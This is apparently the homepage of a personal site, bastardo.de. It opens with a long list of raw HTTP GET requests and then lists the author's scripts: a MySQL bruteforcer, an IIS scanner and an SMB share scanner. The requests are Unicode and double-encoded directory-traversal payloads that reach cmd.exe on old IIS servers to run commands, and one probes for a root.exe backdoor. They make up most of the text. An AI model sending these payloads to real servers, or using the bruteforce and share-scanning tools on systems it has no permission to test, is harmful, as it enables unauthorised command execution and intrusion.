GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir
GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/root.exe?/c+dir
GET /msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir

 

Home

Hello and Welcome to bastardo.de

I have changed the design a little, to a blog; it is easier to maintain.

However ;) here you can find source code and, maybe in the future, some information about a few little scripts I wrote, as well as some administration tips.
I hope you enjoy this site and have fun with my programs. If you find a code error, don’t hesitate to write a comment.

At the moment i will list
MySQL Bruteforce for Linux and Windows
IISscan for Linux (Written in early 2000 for testing purposes )
SmbScan for Linux (Samba/Netbios scanner for large networks, to find free shares in the local network)

You can also find information about programming on my partner site http://code-reference.com
a library about Programming